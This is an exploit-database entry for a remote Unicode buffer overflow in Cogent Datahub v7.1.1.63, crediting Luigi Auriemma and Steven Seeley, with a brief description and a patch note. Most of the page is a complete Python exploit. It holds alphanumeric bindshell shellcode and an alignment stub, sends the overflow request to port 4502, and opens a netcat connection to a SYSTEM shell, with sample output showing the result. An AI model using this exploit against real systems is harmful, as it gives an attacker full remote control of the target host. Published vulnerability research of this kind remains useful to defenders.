Cogent Datahub - exploit.company

vendor:

Cogent Datahub

by:

Luigi Auriemma and Steven Seeley

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Cogent Datahub

Affected Version From: v7.1.1.63

Affected Version To: v7.1.1.63

Patch Exists: YES

Related CWE: N/A

CPE: a:cogent_datahub:cogent_datahub

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows Server 2003, Windows XP SP3

2009

Cogent Datahub <= v7.1.1.63 Remote Unicode Buffer Overflow Exploit

This exploit is a remote buffer overflow vulnerability in Cogent Datahub <= v7.1.1.63. It was discovered by Luigi Auriemma and exploited by Steven Seeley. The exploit sends an overflow of data to the vulnerable application, which then allows the attacker to gain remote code execution on the target system. The exploit was tested on Windows Server 2003 and Windows XP SP3.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update to the latest version of Cogent Datahub.

Source

Exploit-DB raw data:

#!/usr/bin/python
#
# Cogent Datahub <= v7.1.1.63 Remote Unicode Buffer Overflow Exploit
# tested on:
# - windows server 2003
# - windows XP sp3
# questions >> @net__ninja || @luigi_auriemma
# example usage:
# [mr_me@neptune cognet]$ ./cognet_overflow.py 192.168.114.130
#
# -----------------------------------------------------
# ------ Cogent Datahub Unicode Overflow Exploit ------
# ------------- Found by Luigi Auriemma ---------------
# --------- SYSTEM exploit by Steven Seeley -----------
#
# (+) Sending overflow...
# (+) Getting shell..
# Connection to 192.168.114.130 1337 port [tcp/menandmice-dns] succeeded!
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaster>whoami
# whoami
# nt authority\system
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaster>

import socket,time,sys,os

# bindshell on port 1337
shellcodez = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQA"
"IAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1"
"111AIAJQI1AYAZBABABABAB30APB944JBKLQZJKPMK8JYKOKOKOQPTK"
"2LMTMTDKOUOLTKCLKUT8M1JOTKPOLXTKQOMPM1JKOY4KNTTKM1JNNQ9"
"04Y6LU4I0D4M77QHJLMKQ92ZKL4OK0TMTO8BUIUTK1OO4KQZK1VDKLL"
"PKTKQOMLM1ZKM3NLTKU9RLMTMLQQ7SNQ9KQTTK0CNP4KOPLL4KRPMLV"
"M4KOPLHQN384NPNLNJLPPKOJ6QVPSQVQX03OBRHT7RSNR1OB4KO8PBH"
"XKZMKLOKR0KOHVQOU9YU1VE1JMM8KRB5QZLBKOXPBH8YM9JUFMQGKOZ"
"6PSPSR30SQCPC23PCPSKOXPC6RHKUP936PSSYYQV5QX5TMJ40GWPWKO"
"8VRJLPR1R5KOHPQXG4VMNNIY0WKOZ6QC25KOXPBH9U19U6OY27KO9FP"
"PR4R41EKOXPUC1X9W49GVRYPWKO8V0UKOXP1VQZRD2FQXQSBMU9YUQZ"
"0PPYNI8LTI9W2J14U9K201GPKCUZKNORNMKNPBNL63TM2ZNXVKFK6KQ"
"XBRKNVSN6KOT5Q4KOIFQK0WB2PQ0Q0Q1ZM1PQR1PUR1KOXPRHVMJ9KU"
"8NQCKOHVQZKOKO07KOZ0DK0WKLTCWTRDKOHV0RKO8P38JPTJKTQOR3K"
"O8VKO8PKZA")

align= ""
align += "\x54"			# push esp
align += "\x6f"
align += "\x58"			# pop eax
align += "\x6f"
align += "\x05\x6f\x11"	# add eax,11006f00   
align += "\x6f" 
align += "\x2d\x37\x01"	# sub eax,01003700
align += "\x6f"
align += "\x2d\x37\x10"	# sub eax,11003700
align += "\x6f"
align += "\x50"			# push eax
align += "\x6f"
align += "\x48"			# dec eax
align += "\x6f"
align += "\x48"			# dec eax
align += "\x6f"
align += "\x55"			# push ebp
align += "\x6f"
align += "\x59"			# pop ecx
align += "\x08"			# add [eax],cl (carve a 'RETN' onto the stack)
align += "\x6f"
align += "\x40"			# inc eax
align += "\x6f"
align += "\x40"			# inc eax
align += "\x6f\x41" * (48)	# inc ecx (will not effect to our payload)
align += "\x6f"
align += "\x62"			# becomes our carved RETN on the stack (0x61+0x62=0xc3)

request = "(domain \""
request += "\x61" * 1019
request += "\x7f\x55" 	# jmp esp 0x0055007f
request += align
request += shellcodez
request += "\")\r\n"

def banner():
	banner = "\n-----------------------------------------------------\n"
	banner += "------ Cogent Datahub Unicode Overflow Exploit ------\n"
	banner += "------------- Found by Luigi Auriemma ---------------\n"
	banner += "--------- SYSTEM exploit by Steven Seeley -----------\n"
	return banner

if len(sys.argv) < 2:
	print banner()
	print "(-) Usage: %s <target addr> " % sys.argv[0]
	sys.exit(0)

target = sys.argv[1]
print banner()

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,4502))
except:
    print "[-] Connection to %s failed! % (target)"
    sys.exit(0)

print "(+) Sending overflow..."
s.send(request)
s.recv(1024)
# wait for the target, sheesh.
time.sleep(2)
print "(+) Getting shell.."
os.system("nc -vv %s 1337" % target)
s.close()